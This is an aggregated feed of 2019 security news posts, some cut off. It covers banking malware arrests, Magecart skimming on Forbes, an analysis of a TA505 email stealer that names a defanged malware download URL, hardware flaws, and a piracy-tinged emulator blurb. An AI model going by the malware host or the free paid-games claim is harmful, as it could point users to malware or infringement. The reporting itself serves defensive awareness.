The 3DS Emulator can be installed with iOs 11, iOS 11.12 or iOS 11.2 without jailbreaking, the apps give access to paid Nintendo games for free. The Nintendo 3DS emulator for the Apple operating system is a very useful framework that allows users to simulate and create an environment similar to the 3DS console, on their iOS-based mobile phone or computer. The simulation environment is fully functional as if you are using a 3DS console, without obstacles or bugs. Users can experience the same on it looks on the 3DS console.


Related Resource: 

Gamers Be Warned, Never Download ‘Free AAA’ Games In Peer-To-Peer Networks

4 Things Gamers Should Never Forget Even If It Is The Holiday Season

The post Best 5 Nintendo 3DS Emulator for Android, iOS & PC appeared first on .

A joint operation by international police dismantled GozNym gang

A joint effort by international law enforcement agencies from 6 different countries has dismantled the crime gang behind the GozNym banking malware.

GozNym banking malware is considered one of the most dangerous threats to the banking industry, experts estimated it allowed to steal nearly $100 million from over 41,000 victims across the globe for years.

“An unprecedented, international law enforcement operation has dismantled a complex, globally operating and organised cybercrime network.” reads the press release published by the Europol. “The criminal network used GozNym malware in an attempt to steal an estimated $100 million from more than 41 000 victims, primarily businesses and their financial institutions.”


The GozNym banking malware was first spotted in April 2015 by researchers from the  IBM X-Force Research, it combines the best features of Gozi ISFB and Nymaim malware.

The GozNym has been seen targeting banking institutions, credit unions, and retail banks. Among the victims of the GozNym Trojan there are 24 financial institutions in North America and organizations in Europe, including a Polish webmail service providers, investment banking and consumer accounts at 17 banks in Poland and one bank in Portugal.

Now the Europol announced the unprecedented, international law enforcement operation that allowed to dismantled the complex, globally operating and organised cybercrime network.

Europol with the help of law enforcement agencies from Bulgaria, Germany, Georgia, Moldova, Ukraine, and the United States identified and 0 individuals alleged members of the GozNym network.

5 defendants were arrested during several coordinated searches conducted in Bulgaria, Georgia, Moldova, and Ukraine, the remaining ones are Russians citizens and are still on the run, including the expert who developed the banking malware.

The cybercrime organization has been described by the Europol as a highly specialised and international criminal network.

One of the members that encrypted GozNym malware to avoid detection by security solutions, was arrested and is being prosecuted in the Republic of Moldova.

Operators behind the GozNym malware used the Avalanche network to spread the malware.

“Bulletproof hosting services were provided to the GozNym criminal network by an administrator of the “Avalanche” network.  The Avalanche network provided services to more than 200 cybercriminals, and hosted more than twenty different malware campaigns, including GozNym.” continues the press release published by Europol. Through the coordinated efforts being announced today, this alleged cybercriminal is now facing prosecution in Ukraine for his role in providing bulletproof hosting services to the GozNym criminal network.  The prosecution will be conducted by the Prosecutor General’s Office of Ukraine and the National Police of Ukraine.

The members of the gang used banking malware to infect victims’ computers and steal their online banking credentials.

“A criminal Indictment returned by a federal grand jury in Pittsburgh, USA charges ten members of the GozNym criminal network with conspiracy to commit the following:

  • infecting victims’ computers with GozNym malware designed to capture victims’ online banking login credentials;
  • using the captured login credentials to fraudulently gain unauthorised access to victims’ online bank accounts;
  • stealing money from victims’ bank accounts and laundering those funds using U.S. and foreign beneficiary bank accounts controlled by the defendants.

The defendants are well known on Russian underground, they advertised their specialized technical skills and services in Russian-speaking online criminal forums. Through these forums the leader of the GozNym network recruited them.

“The leader of the GozNym criminal network, along with his technical assistant, are being prosecuted in Georgia by the Prosecutor’s Office of Georgia and the Ministry of Internal Affairs of Georgia.” continues the Europol.

Below the advisory published by the FBI:


Pierluigi Paganini

(SecurityAffairs – GozNym, malware)

The post A joint operation by international police dismantled GozNym gang appeared first on Security Affairs.

Cisco Service Provider, WebEx Bugs Offer Up Remote Code Execution

The vendor also issued a patch schedule for the still-unpatched bug in its Secure Boot trusted hardware environment, which affects most of its enterprise and SMB portfolio, amounting to millions of vulnerable devices.

Forbes subscribers warned of Magecart threat skimming credit card details

The notorious Magecart malware, that blights online stores by stealing payment card details from unsuspecting shoppers at checkout, has claimed another high profile victim. Security researcher Troy Mursch raised the alarm on Twitter that the Forbes magazine subscription website had been compromised with malicious code that was siphoning off sensitive credit card information as users […]… Read More

The post Forbes subscribers warned of Magecart threat skimming credit card details appeared first on The State of Security.

Microsoft renewed its Attack Surface Analyzer, version 2.0 is online

Microsoft has renewed its Attack Surface Analyzer tool to take advantage of modern, cross-platform technologies.

The first version of the Attack Surface Analyzer 1.0 was released back in 2012, it aims at detecting and changes that occur in the Windows operating systems during the installation of third-party applications. 

The Analyzer has been released on GitHub, it has been developed using .NET Core and Electron. The choice to use these two cross-platform technologies allows running on macOS and Linux, and of course Windows.

“Attack Surface Analyzer is a Microsoft-developed open source security tool that analyzes the attack surface of a target system and reports on potential security vulnerabilities introduced during the installation of software or system misconfiguration.” reads the README file published by Microsoft.

“Attack Surface Analyzer 2.0 replaces the original Attack Surface Analzyer tool, released publicly in 2012.”

Attack Surface Analyzer

Users of Attack Surface Analyzer could determine changes to the system attack surface introduced when a software is installed and evaluate risk presented when third-party software is installed.

The tool is able to detect any changes to OS components, including file system (static snapshot and live monitoring available), user accounts, services, network ports, certificates, registry (Windows only).

“The core feature of Attack Surface Analyzer is the ability to “diff” an operating system’s security configuration, before and after a software component is installed.” continues Microsoft. “This is important because most installation processes require elevated privileges, and once granted, can lead to unintended system configuration changes.”

The tool reports on potential vulnerabilities introduced during app installation. 

“This tool can play an important role in ensuring that the software you develop or deploy doesn’t adversely affect the operating system security configuration by allowing you to scan for specific types of changes,” reads a blog post published by Microsoft. 

Microsoft pointed out that the tool includes both Electron and command line interface options. The results for the command line use option are written to a local HTML or JSON file, an implementation choice that makes it easy to include the tool in the user automated toolchain.

Pierluigi Paganini

(SecurityAffairs – fingerprints, Genesis Store)

The post Microsoft renewed its Attack Surface Analyzer, version 2.0 is online appeared first on Security Affairs.

Epsiode 494 – Why Forcing Password Resets Makes You Less Secure

This epsiode is a continuation on the death of the password. I talk about how forcing resets actually can make you less secure and what the future may bring for authenticaiton for everyone. Be aware, be safe. *** Support the podcast with a cup of coffee *** – Ko-Fi Security In Five Don’t forget to […]

The post Epsiode 494 – Why Forcing Password Resets Makes You Less Secure appeared first on Security In Five.

A flaw in Google Titan Security Keys expose users to Bluetooth Attacks

Titan Security Keys are affected by a severe vulnerability, for this reason, Google announced it is offering a free replacement for vulnerable devices.

Google announced it is offering a free replacement for Titan Security keys affected by a serious vulnerability that could be exploited by to carry out Bluetooth attacks.

Titan Security Keys

The Titan Security Keys were introduced by Google in July 2018 to provide an additional layer of security to its users and protect them from Phishing and MiTM attacks.

The Titan Security Key is based on the Fast IDentity Online (FIDO) Alliance, U2F (universal 2nd factor) protocol and was entirely designed by Google.

The Titan Security Keys are available in both USB and Bluetooth versions, 

The vulnerability affects the Bluetooth Low Energy (BLE) version of T1 and T2 Titan Security Keys, both USB and NFC security keys are not impacted.

Google users can refer a page set up by the company to discover if their devices are affected by the flaw and receive instructions to replace them.

The vulnerability is a misconfiguration issue in the Titan’s Bluetooth pairing protocols that was discovered by Microsoft. Google explained that the attack is hard to exploit, an attacker physically close to the victim could trigger the flaw only in under specific conditions.

The attacker has to connect their device to the victim’s security key before the legitimate device connects, moreover he has to launch the attack exactly when the victim presses the button on their dongle.

“Due to a misconfiguration in the Titan Security Keys’ Bluetooth pairing protocols, it is possible for an attacker who is physically close to you at the moment you use your security key — within approximately 30 feet — to (a) communicate with your security key, or (b)communicate with the device to which your key is paired.” reads the advisory published by Google.

Below the conditions that the attacker would match to carry out the attack:

  • When you’re trying to sign into an account on your device, you are normally asked to press the button on your BLE security key to activate it. An attacker in close physical proximity at that moment in time can potentially connect their own device to your affected security key before your own device connects. In this set of circumstances, the attacker could sign into your account using their own device if the attacker somehow already obtained your username and password and could time these events exactly.
  • Before you can use your security key, it must be paired to your device. Once paired, an attacker in close physical proximity to you could use their device to masquerade as your affected security key and connect to your device at the moment you are asked to press the button on your key. After that, they could attempt to change their device to appear as a Bluetooth keyboard or mouse and potentially take actions on your device.

The attacker can also use its own device to connect to the victim’s device when the button is pressed on the key. Once connected, the hacker can set the device to a Bluetooth mouse or keyboard and perform actions on the victim’s device.

Even if the keys are vulnerable to Bluetooth attacks, they remain the strongest protection against phishing attacks.

“Security keys remain the strongest available protection against phishing; it is still safer to use a key that has this issue, rather than turning off security key-based two-step verification (2SV) on your Google Account or downgrading to less phishing-resistant methods (e.g. SMS codes or prompts sent to your device),” continues Google.

Mobile users have been advised to use their Titan Security Keys only when cannot be in physical proximity of a potential attacker.

Pierluigi Paganini

(SecurityAffairs – Titan Security Keys, hacking)

The post A flaw in Google Titan Security Keys expose users to Bluetooth Attacks appeared first on Security Affairs.

Intel MDS attack mitigation: An overview

Intel has revealed on Tuesday that some of its CPUs are vulnerable to a number of new speculative execution attacks that may allow attackers to stealing sensitive data and keys/passwords. ZombieLoad, RIDL and Fallout attacks have been extensively written about by the various groups of researchers that came up with them, but many customers and enterprise users are still unclear on whether these could affect them and what they can do to protect themselves. A … More

The post Intel MDS attack mitigation: An overview appeared first on Help Net Security.

The stealthy email stealer in the TA505 hacker group’s arsenal

Experts at Yoroi-Cybaze Z-Lab observed a spike in attacks against the banking sector and spotted a new email stealer used by the TA505 hacker group


During the last month, our Threat Intelligence surveillance team spotted increasing evidence of an operation intensification against the Banking sector. In fact, many independent researchers pointed to a particular email attack wave probably related to the known TA505 hacking group, active since 2014 and focusing on Retail and Banking companies. The group is also known for some evasive techniques they put in place over time to avoid the security controls and penetrate corporate perimeters with several kinds of malware, for instance abusing the so-called LOLBins (Living Off The Land Binaries), legit programs regularly used by victim, or also the abuse of valid cryptographically signed payloads.

Figure 1. Attack campaign spotted in the wild.

Investigating and tracking their operations during April and May we detected an interesting tool was delivered through the victim machine. Just after the opening of malicious documents and the installation of FlawedAmmy RAT implants, the group used to deploy a particular credential stealing software, part of their arsenal, revealing details of their recent operation.

Figure 2. Attack campaign spotted in the wild.

Technical Analysis

The piece of malware under analysis were downloaded from “bullettruth[.com/out[.exe”, it was executed into the victim machines after the establishment of the infection.

ThreatCustom Email Stealer
Brief DescriptionExecutable of the email stealer
Figure 3: Malware Signature by SLON LTD

Firstly, we noticed this secondary component was well protected against antivirus detection, in fact, the PE file was signed by Sectigo in the first half of May, one of the major Russian Certification Authority. Analyzing the trust chain we found the attackers were relying on cryptographic keys released to a UK company named  SLON LTD. At this time, we have no evidence to hypothesize it could be a victim of previous hacks or not.

Anyway, a static inspection of the binary revealed that the malware has a quite high entropy level, suggesting it may be packed.

Figure 4: Malware suspicious entropy level

Dynamically executing the malware, more information about its behaviour is revealed. The malicious executable is substantially an email stealer, in fact, the only purpose is to retrieve all the emails and passwords accounts present inside the victim machine. After executing the information gathering routine, the malware sends to its C2 all the retrieved emails and passwords:

Figure 5: HTTP POST communication

The interesting thing about the communication with the C2 is the fact that there is no encryption: the data harvested are sent to the C2 in JSON format. Investigating the attacker infrastructure we noticed interesting information such as the information of the stolen emails through our Digital Surveillance systems.

In order to retrieve more details about this Email Stealer, the analysis has moved into debugging and disassembling. As previously mentioned, the malware sample is heavily obfuscated and packed. However, by letting the malware execute itself within a debugger, we were able to extract the unpacked payload of the malware.

Figure 6: Static information about the packed sample (on the left) and the unpacked one (on the right)

As shown by the above figure, we notice a peculiarity of these two components: while the packed sample is compiled in Microsoft Visual C++ version 6.0, the unpacked one is compiled in Microsoft Visual C++ version 8. At this point, we deepen the analysis on the extracted payload. However, we are not able to execute it, because it always references many memory addresses of the original one. So, we carry on static analysis on the extracted sample.

As previously described, the malware’s principal purpose is to iterate through the filesystem looking for email accounts.. The first step is to check whether the “outlook.exe” process is running and, in this case it kills the process.The malware iterate through user processes with Process32FirstW API and then kill it with TerminateProcess:

Figure 7: Outlook process search routine

The extracted payload does not present any type of code obfuscation of other types. In fact the C2 server and the path is not encoded:

Figure 8: C2 connection routine

The last routine being analyzed is the credential harvesting inside the entire filesystem.

Apart from the routine that searches for the email account registered in Outlook and Thunderbird clients (as shown in Figure 7), there is another one which scans the filesystem looking for hardcoded extensions, then, if one of them is found, a reference to the found file is conserved inside the %TEMP% directory. At this point, all the gathered email accounts are sent to the server and then erasing  all traces of itself from the infected machine, in fact, the malware creates a simple batch script which delete itself and all the tracks of infection.

Figure 9: Autodeletion batch script

Analysis of Exposed Emails

In this paragraph are shown some statistics about the harvested emails in the attack campaign, recovered during surveillance and hunting operations. So we decided to create a graph in which sort the most frequent TLD occurrences of all the stolen data.

Figure 10: Distribution of TLD

As seen in the graph above, the most frequent TLD is .com with 193.194 occurrences, following .kr with 102.025 occurrences, .cn with 26.160 occurrences, it with 6.317 occurrences and so on. To better visualize the macro-locations involved in this exposure we built a heatmap showing the geographical distribution of the TOP 100 countries referenced in the TLDs.

Figure 11: Geolocation of emails TLD exposure

The heatmap shows the less-affected countries with a greenish color, on the contrary, the most-affected ones tend to an orange or red-tinged color. The first thing that emerges from these 2 distributions is that this specific threat seems not to be targeted, in fact, the diffusion is almost global with some red or orange zones in UK, Italy, Republic of Korea, China, Germany, Hungary, Taiwan, Japan, India and Mexico. All these countries exceeded the thousand occurrences.


Nowadays, the email accounts are an effective source of revenue for the cyber criminals. In fact all these information can be used to spread other malware through phishing campaigns, to perform BEC attacks (Business Email Compromise) and also to try credential stuffing attacks.

Evan a simple Info-Stealer malware like this one could be a dangerous threat, especially if used by organized groups in conjunction with other malware implants. In fact, as reported by the independent researcher Germán Fernández Bacian too, this Email Stealer has been recently used by the infamous TA505 hacking group. This link means, with good confidence, the exposed data, full email accounts in some cases and email contacts in general, are now available to a cyber-criminal group who launched targeted attacks against Banks and Retail industries in the near past.

Technical details, including IoCs and Yara Rules, are available in the analysis published on the Yoroi blog.

[adrotate banner=”9″][adrotate banner=”12″]

Pierluigi Paganini

(SecurityAffairs – TS505, malware)

The post The stealthy email stealer in the TA505 hacker group’s arsenal appeared first on Security Affairs.

Smashing Security #128: Shackled ankles, photo scrapes, and SIM card swaps

A bad software update causes big headaches for Dutch police, but brings temporary freedom to criminals. SIM swaps are in the news again as fraudsters steal millions. And does your cloud photo storage service have a dirty little secret?

All this and much much more is discussed in the latest edition of the “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by Rip Off Britain’s David McClelland.

UK Fraud Complaints Surge Over 40%

UK Fraud Complaints Surge Over 40%

UK consumers’ complaints over banking fraud have surged by over 40% to hit an all-time high in the 2018-19 financial year, driven by online scams, according to official figures.

The Financial Ombudsman Service (FOS), which settles disputes between customers and their banks, said it received 12,195 complaints over the period, a 43% increase on the 6952 in the previous 12 months.

“One of the fastest-growing types of fraud is authorized push payment (APP) fraud — where people unwittingly act on fraudsters’ instructions and carry out the transactions themselves,” the FOS said.

“We’ve been taking a close look at the APP complaints we’ve received. And we’ve reminded banks of their existing obligations to ensure that victims of fraud are treated fairly, as we’ve found that they haven’t always got this right.”

A new voluntary code of practice will come into force at the end of May designed to help victims of APP fraud get their money back more easily. Up until now, banks have been reluctant to pay out in such cases and often blame the individual.

Some £354m was lost to APP fraud in the UK last year, up 50% from 2017. Although some lenders, like TSB, have sought to differentiate by promising to refund victims, the industry in general has been slow to react to the threat.

“Bank transfer fraud is spiraling out of control, with people losing life-changing sums every day and then facing a grueling battle to get their money back from the very banks that should be preventing them from falling victim in the first place,” argued Gareth Shaw, head of money at consumer rights group Which.

“Banks have just two weeks to sign up to the new industry code [of practice], which will only be deemed a success if they finally halt this worsening crime by offering better protection to their customers, while swiftly and fairly reimbursing all those who lose money through no fault of their own.’

Another new proposal comes from the Payment Systems Regulator (PSR) and will introduce “confirmation of payee checks” to warn users when the name they enter into online bank transfers doesn’t match the sort code and account number on record.

However, a July 1, 2019 deadline is now set to be pushed back to 2020.

WhatsApp attacked by spyware | TECH(feed)

WhatsApp’s recent spyware hack took advantage of a security vulnerability and allowed attackers to access private, digital communication. In this episode of TECH(feed), Juliet walks through the hack, who was affected and how you can secure your devices ASAP.

The Six Most Effective Email Spam Blocker Tips

Email, as we know, is always susceptible to spam. Anyone using email would have to face spam almost on a regular basis. Email clients today are equipped with anti-spam filters that filter and move spam to separate folders. But since such filters are not 100 percent effective, it’s always best for email users to know how to deal with spam in an effective manner. Here’s a look at some of the most effective of email spam blocker tips that could help combat spam in the best of manners

Begin by training your spam filter

As we’ve already stated, the email spam filter that your email client is equipped with by default is not 100 percent perfect in filtering emails and detecting spam. Thus, it becomes important for you to keep training your spam filter to be more perfect. This can be done in two ways. Firstly, whenever you come across spam that has sneaked past the spam filter and landed up in your inbox, you shouldn’t limit yourself to just deleting it. You should select it and tell your email client that it is spam by clicking on the button that’s given to report spam. Secondly, when mail that is not spam lands up in your spam folder, you should select it and tell the client that it made a mistake. You should click on the ‘Not Spam’ (or similar) button. This way, you can train your spam filter to perform better.

Secondly, train yourself not to respond to spam

Well, we’d say this is of utmost importance among all email spam blocker tips. Security always starts from the individual users. You must train yourself, in the very first place, to refrain from responding to spam. You’ll be coming across, almost on a daily basis, spam emails landing up in your inbox. Many of these might even look genuine. You need to train yourself to identify spam and also to refrain from responding to them. Even if an email seems a bit suspicious don’t click on the accompanying link or open the accompanying attachment. Confirm the genuineness of the email and then only open the link or the attachment. Similarly, whenever you realize that you’ve got spam that has been sent from a known email address, contact that person and pass on information regarding the same. That person might not be aware of this. This helps in effective prevention of the spreading of spam emails.

Learn to protect and, if needed, hide your email address

You must learn to protect your email address from spam. There are some very important things that you need to do for this. It’s best to have one or more alternative email addresses, which you could use for things like hotel booking, online shopping etc. This way, your primary email address would be saved from those unwanted spam emails that come following your online purchases or reservations or any such web activities that might enlist you to a spam despatch list.

Another thing that you could do to protect your email address is to hide it as much as possible. Never publish your primary email address on the web unless you absolutely have to do it. At places where you have to publish your email address, publish a secondary one if that’s OK. Publish your primary email address only when you have to do it.

Use third-party antispam filters

It’s always best to use third-party antispam filters or extensions that could help nab those spam emails that sneak past your default email spam filter. Such third-party filters work by identifying spam as messages travel between an email server and an email client. There are different options- free as well as paid- depending on the kind of device you are using and also depending on the extent of your filtering requirements.

Learn to unsubscribe things that you don’t need

There are certain things that come seeking you on a periodic level, like newsletters, which you might not actually need. It would be advisable if you can unsubscribe to such services if you don’t need them at all. Yes, make it a point to unsubscribe things that you don’t need in your inbox. There would be links that would allow you to unsubscribe to such services or to stop receiving emails from that source. This step could help curb spam emails, which might accompany such emails and newsletters, to a great extent.

Change email address, if needed

You must be ready to change your primary email address if needed. When you have accidentally responded to spam and your email address is infected beyond repair, when your email address has been revealed at too many places and stand chances of being suspected to spam attacks, and when your email address has loads of spam in it despite existing security measures being taken (because of security flaws or other such issues) it’s best to change your primary email address, at the earliest. This, we agree, is a drastic step, but if such a drastic step has to be taken, just go for it. Security, after all, is of utmost importance.


Related Resources: 

Best Anti-Spam Email Filters for Thunderbird

How To Avoid Being A Phishing Scams Victim

Is It Possible To Have Email Security Without OpenPGP/S-MIME?

Phishing Emails Are Here To Stay, Says Security Firm

The post The Six Most Effective Email Spam Blocker Tips appeared first on .

Magecart hackers inject card Skimmer in Forbes Subscription Site

The Magecart gang made the headlines again, the hackers this time compromised the Forbes magazine subscription website.

The Magecart group is back, the hackers this time compromised injected a skimmers script into the Forbes magazine subscription website.

The malicious traffic was spotted by the security expert Troy Mursch
Chief Research Officer of Bad Packets, on Wednesday.

Magecart forbes magazine

Magecart hackers have installed malicious JavaScript skimmer on to siphon payment card data entered into the site by subscribers. Crooks injected an obfuscated JavaScript in the HTML code of the payment section, the script decoded is here.

The expert immediately attempted to report his discovery to Forbes via email, but without success.

The payment page was taken down at around 1400 UTC and it is still offline at the time of writing.

A Forbes spokesperson told El Reg that is investigating the incident and that at this stage, it is not aware of the theft of any customers’ credit card information. Recent subscribers should remain vigilant and check their credit card statements for signs of fraudulent activities.

Forbes was likely a victim of a supply chain attack, Magecart hackers have compromised a company that provides services to the media outlet.

During the weekend, the forensic expert Willem de Groot discovered that the records of customers of Picreel, a web marketing software supplier, had been leaked online.

Forbes is one of the customers of Picreel, and Magecart hackers used the leaked data to access Forbes infrastructure and install the skimmer script.

“Last weekend, security researchers surfaced new supply-chain attacks involving Magecart web-skimmers placed on several web-based suppliers, including AdMaxim, CloudCMS, and Picreel. The breaches were part of a large-scale attack that hit a breadth of providers simultaneously intending to access as many websites as possible.” reads the analysis published RiskIQ.

Thousands of other companies that are customers at Picreel are at risk, potentially affected domains are listed here.

Security firms have monitored the activities of a dozen Magecart groups at least since 2015. The gangs use to implant skimming script into compromised online stores in order to steal payment card data, but they are quite different from each other.

According to a joint report published by RiskIQ and FlashPoint in March, some groups are more advanced than others. The list of victims of Magecart groups is long and includes several major platforms such as British AirwaysNeweggTicketmaster, and Feedify​​

Recently the Magecart group stole payment card details from the e-commerce system used by colleges and universities in Canada and the US.

Pierluigi Paganini

(SecurityAffairs – Magecart, Forbes)

The post Magecart hackers inject card Skimmer in Forbes Subscription Site appeared first on Security Affairs.

Rights Group Win Allows Courts to Scrutinize Spy Agencies

Rights Group Win Allows Courts to Scrutinize Spy Agencies

Privacy campaigners are hailing a major legal victory after the Supreme Court ruled that the intelligence services should not be exempt from oversight by ordinary UK courts.

Privacy International (PI) has fought a five-year case with the government, following the Edward Snowden disclosures that UK spies used bulk hacking techniques which may have impacted millions.

The case was initially heard in the secret Investigatory Powers Tribunal (IPT) — which rules specifically on cases involving the intelligence services. It agreed in principle with the government that it would be acceptable to use a single, broad warrant to hack every mobile phone in a UK city.

PI tried to fight that decision in the High Court, with the government arguing that IPT rulings couldn’t be subject to regular judicial review. Both the High Court and then the Court of Appeal agreed with the government, but the rights group was in 2017 allowed to take its case all the way to the Supreme Court.

Its decision yesterday effectively means that IPT decisions can be subject to judicial review in the High Court, which means mistakes made by the tribunal can now be corrected by the courts.

PI general counsel, Caroline Wilson Palow, argued the ruling was a “historic victory for the rule of law.”

“Countries around the world are currently grappling with serious questions regarding what power should reside in each branch of government. Today's ruling is a welcome precedent for all of those countries, striking a reasonable balance between executive, legislative and judicial power,” she added.

“Today's ruling paves the way for Privacy International's challenge to the UK government's use of bulk computer hacking warrants. Our challenge has been delayed for years by the government's persistent attempt to protect the IPT’s decisions from scrutiny. We are heartened that our case will now go forward."

Trump Declares National Emergency to Contain China Threat

Trump Declares National Emergency to Contain China Threat

The Trump administration has turned up the heat on China after declaring a national emergency designed ostensibly to protect US networks from “foreign adversaries.”

Although China and Huawei are not named in the declaration, it is widely seen as a move designed to target the latter. It will effectively extend the federal ban on Huawei equipment to all US firms.

Separately, and perhaps even more importantly, the Shenzhen giant and 70 affiliates have been placed on an “entity list.”

This means that it will not be able to source key components from US providers without Commerce Department approval.

Depending on whether this approval is granted or not, this could put the firm in a serious position similar to ZTE's when US firms were prohibited from selling to it after the Chinese telecoms firms broke Iran sanctions. At that time, only an intervention from Trump saved the company.

US officials told Reuters the decision would make it nearly impossible for Huawei to sell some of its products as they rely on US-made kit.

A White House statement revealed that the Executive Order invoked the International Emergency Economic Powers Act, which allows a President to interfere with commerce in order to protect national security. The Commerce Department now has 150 days to draw up an enforcement plan.

“The President has made it clear that this administration will do what it takes to keep America safe and prosperous, and to protect America from foreign adversaries who are actively and increasingly creating and exploiting vulnerabilities in information and communications technology infrastructure and services in the United States,” noted a message from the White House press secretary.

“This Executive Order declares a national emergency with respect to the threats against information and communications technology and services in the United States and delegates authority to the Secretary of Commerce to prohibit transactions posing an unacceptable risk to the national security of the United States or the security and safety of United States persons.”

Unsurprisingly, Huawei and China have hit back, claiming the order will not make the US safer but only result in delayed 5G roll-outs which will harm consumers.

Washington has so far failed to produce any hard evidence to suggest that Huawei is a national security risk, although Chinese law demands that any Middle Kingdom firm co-operate with the authorities if required.

However, UK intelligence services have raised serious concerns around the quality of the telecoms kit maker’s “security and engineering processes.”

Still, Prime Minister Theresa May recently overruled several Cabinet members in approving the firm to supply non-core 5G kit.

Steve Patton, director and cybersecurity Specialist at Telesoft Technologies, argued that a “measured approach” is needed to combat telecoms cyber risk.

“Even with a network built from other, non-Chinese vendors, there should be additional protection and — more importantly — monitoring of critical infrastructure to scan for threats,” he said.

“After all, given we live in a truly technological age, where cyber-threats are increasingly advanced, it's impossible to guarantee that any one vendor is fully immune from attacks.”

Why ISO 27005 risk management is the key to achieving ISO 27001 certification

If you’re familiar with ISO 27001, you’ll know that it’s the international standard for information security and contains the certification requirements that are expanded upon throughout the ISO 27000 series.

There are 46 standards in total in the series (although only a few apply to every organisation), of which ISO 27005, the risk management standard, is arguably the most important and easiest to get wrong.

What is risk management?

Risk management is the process of analysing how an organisation will be affected by a disruptive incident and what the consequences might be. This includes any scenario in which the confidentiality, integrity and availability of data is compromised.

Assessing these risks helps inform your decision about the best way to reduce risk to an acceptable level.

Getting this process right is essential, because your entire ISMS (information security management system) is shaped around your response to risks. You need an accurate estimation of how risks will play out in order to prioritise the biggest threats and adopt the appropriate controls.

What does ISO 27005 say?

As with every standard in the ISO 27000 series, ISO 27005 doesn’t prescribe a specific approach to risk management. This is because organisations have their own challenges and must tackle them in a way that suits them.

This is markedly different from other popular risk management standards such as OCTAVE and NIST SP 800-30, which adopt a one-size-fits-all approach and are perceived to restrict business efficiency and productivity.

That’s not to say organisations have to figure everything out themselves. ISO 27005 provides a detailed but flexible structure to meet its requirements, comprising five stages.

1. Identification

  • Identify assets: First, you need to locate every piece of information you hold and determine whether it is a ‘primary’ or ‘supporting’ asset. Primary assets are information or business processes, and supporting assets are related IT systems, infrastructure and people resources. Organisations are required to identify primary assets, and supporting assets that could have an impact on the primary asset, typically giving details about asset ownership, location and function.
  • Identify threats: Threats are many and varied, and should be continuously monitored to take into account new and emerging threats.
  • Identify vulnerabilities: Your organisation will have weaknesses in its technology, people (human error, malicious action, social engineering, etc.) and processes, all of which need to be identified.
  • Identify existing controls: Unlike other risk assessment methodologies, an ISO 27005 risk assessment requires an organisation to identify all of its existing controls and to take into account the protection provided by these controls before applying any new ones.

2. Assessment

ISO 27005 encourages organisations to focus their response efforts on the biggest threats, so you should use the information you’ve gathered about your assets, vulnerabilities and threats to prioritise the biggest risks.

There are many ways to do this, but the most common approach involves the following equation:

Risk = (the probability of a threat exploiting a vulnerability) x (total impact of the vulnerability being exploited)

Find out more about risk assessment >>

3. Treatment

Now that you know the level of risk that each threat poses, you need to decide how you’ll treat them. There are four options:

  • Modify the risk by implementing a control to reduce the likelihood of it occurring. For example, you might address the risk of a work-issued laptop being stolen by creating a policy that instructs employees to keep devices with them and to store them safely.
  • Avoid the risk by ceasing any activity that creates it. This response is appropriate if the risk is too big to manage with a security control. For example, if you’re not willing to take any chances of a laptop being stolen, you might choose to ban employees from using them off-site. This option will make things less convenient for your employees but will drastically improve your security posture.
  • Share the risk  with a third party. There are two ways you can do this: by outsourcing the security efforts to another organisation or by purchasing cyber insurance to ensure you have the funds to respond appropriately in the event of a disaster. Neither option is ideal, because you are ultimately responsible for your organisation’s security, but they might be the best solutions if you lack the resources to tackle the risk.
  • Retain the risk. This means that your organisation accepts the risk and believes that the cost of treating it is greater than the damage that it would cause.

The method you choose depends on your circumstances. Avoiding the risk is the most effective way of preventing a security incident, but doing so will probably be expensive if not impossible. For example, many risks are introduced into an organisation by human error, and you won’t often be able to remove the human element from the equation.

You’ll therefore be required to modify most risks. This involves selecting the relevant information security controls, which are outlined in Annex A of ISO 27001 and explained further in ISO 27002.

4. Communication

You need to keep a record of how you are tackling the risk and inform anyone who might be affected.

For example, if you’ve modified the risk of certain sensitive documents being misappropriated by applying access controls to them, you should tell your employees. This ensures that, should a staff member be denied access when they have a legitimate need to view the information, they know what the issue is and what action to take.

Likewise, if you’re avoiding a risk by no longer doing whatever it is that caused the problem, you also need to pass on the message to your staff.

5. Review

Risk management (and ISO 27001 compliance generally) is an ongoing process, so you need to regularly monitor your management plan. This serves two purposes. First, it enables you to check whether the treatment options you selected are working as intended. You might find that a control you implemented isn’t addressing the risk as well as you’d hoped or that it’s simply not appropriate. Likewise, you might have chosen to avoid certain risks but found that they are still present.

Second, it enables you to assess the changing threat landscape. New risks will have emerged and existing ones might have transformed, forcing you to reassess your priorities and your approach to risk management.

Learn how to deliver effective ISO 27005 risk management

Our ISO 27005 Certified ISMS Risk Management training course is the ideal starting point for anyone who wants to know more about how to deal with information security threats.

This three-day course develops your understanding of the key areas of information risk management, and is based on recognised best practice and real-world examples.

Find out more >>

A version of this blog was originally published on 8 May 2017.

The post Why ISO 27005 risk management is the key to achieving ISO 27001 certification appeared first on IT Governance Blog.

BlackTech espionage group exploited ASUS update process to deliver Plead Backdoor

The BlackTech cyber-espionage group exploited the ASUS update process for WebStorage application to deliver the Plead backdoor.

The cyber espionage group tracked as BlackTech compromised the ASUS update process for WebStorage application to deliver the Plead backdoor.

The BlackTech group was first observed by ESET on July 2018, when it was abusing code-signing certificates stolen from D-Link for the distribution of the Plead backdoor that has been in the wild since at least 2012.

According to the experts, the cyber espionage group is highly skilled and most of its victims are in the East Asia region, particularly Taiwan.

At the end of April 2019, experts from ESET observed observed multiple attempts to deploy the Plead backdoor. In the attacks observed by the researhcers, the Plead backdoor was created and executed by a legitimate process named AsusWSPanel.exe that is associated with the Windows client for a cloud storage service called ASUS WebStorage. The executable file used in the attack is digitally signed by ASUS Cloud Corporation.

Experts noticed that all observed samples of the Plead backdoor had the file name ‘Asus Webstorage Upate.exe.’ Experts discovered that
during the software update process, the AsusWSPanel.exe module of ASUS WebStorage can create files with such filenames.

Threat actors might have had access to the update mechanism a circumstance that suggest two attack scenarios:

  • Hackers hack compromise the supply chain for the ASUS WebStorage cloud service;
  • Hackers were in the position to carry out a MITM attack, given that WebStorage binaries are delivered via HTTP during the update process. 

Experts believe that the second scenario is more plausible updates for the
ASUS WebStorage software are not provided through a secure connection and the process lack of validation for the binaries downloaded.

“The ASUS WebStorage software is vulnerable to a man-in-the-middle attack (MitM).” reads the advisory published by ESET. “Namely, the software update is requested and transferred using HTTP; once an update is downloaded and ready to execute, the software doesn’t validate its authenticity before execution. Thus, if the update process is intercepted by attackers, they are able to push a malicious update.”

Experts from ESET noticed that most of the affected organizations have routers made by the same vendor and their admin panels are exposed online. It is likely that attackers compromised the routers to carry out a MitM attack.

Plead backdoor

